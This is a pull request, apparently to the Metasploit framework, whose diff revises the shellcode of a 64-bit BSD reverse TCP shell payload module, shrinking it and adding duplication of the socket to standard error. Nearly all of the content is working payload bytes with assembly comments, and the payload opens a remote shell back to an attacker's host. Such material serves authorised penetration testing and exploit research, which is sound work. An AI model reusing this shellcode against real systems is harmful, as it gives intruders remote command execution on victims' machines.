### PR TITLE
Fix up the 64bit BSD reverse shell

### DIFF
--- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 108
+  CachedSize = 98
 
   include Msf::Payload::Single
   include Msf::Payload::Bsd

--- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
@@ -85,7 +85,6 @@ module MetasploitModule
       "\x83\xc0\x5A" +                             # add eax,0x5a
       "\x48\xFF\xC6" +                             # inc rsi
       "\x0F\x05" +                                 # loadall286
-      "\x48\x31\xC0" +                             # xor rax,rax
       "\x31\xc0" +                                 # xor eax,eax
       "\x83\xc0\x3B" +                             # add eax,0x3b
       call +                                       # call CMD.len

--- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
@@ -77,14 +77,13 @@ module MetasploitModule
       "\x5A" +                                     # pop rdx
       "\x0F\x05" +                                 # loadall286
       "\x4C\x89\xE7" +                             # mov rdi,r12
-      "\x31\xc0" +                                 # xor eax,eax
-      "\x83\xc0\x5A" +                             # add eax,0x5a
-      "\x48\x31\xF6" +                             # xor rsi,rsi
+      "\x6A\x03" +                                 # push byte +0x3
+      "\x5E" +                                     # pop rsi
+      "\x48\xFF\xCE" +                             # dec rsi
+      "\x6A\x5A" +                                 # push +byte 0x5a
+      "\x58" +                                     # pop rax
       "\x0F\x05" +                                 # loadall286
-      "\x31\xc0" +                                 # xor eax,eax
-      "\x83\xc0\x5A" +                             # add eax,0x5a
-      "\x48\xFF\xC6" +                             # inc rsi
-      "\x0F\x05" +                                 # loadall286
+      "\x75\xF6" +                                 # jne -0x8
       "\x31\xc0" +                                 # xor eax,eax
       "\x83\xc0\x3B" +                             # add eax,0x3b
       call +                                       # call CMD.len


### PR DESCRIPTION
This adds duplication of the socket fd to STDERR_FILENO and removes a
superfluous xor in singles/bsd/x64/shell_reverse_tcp.rb.
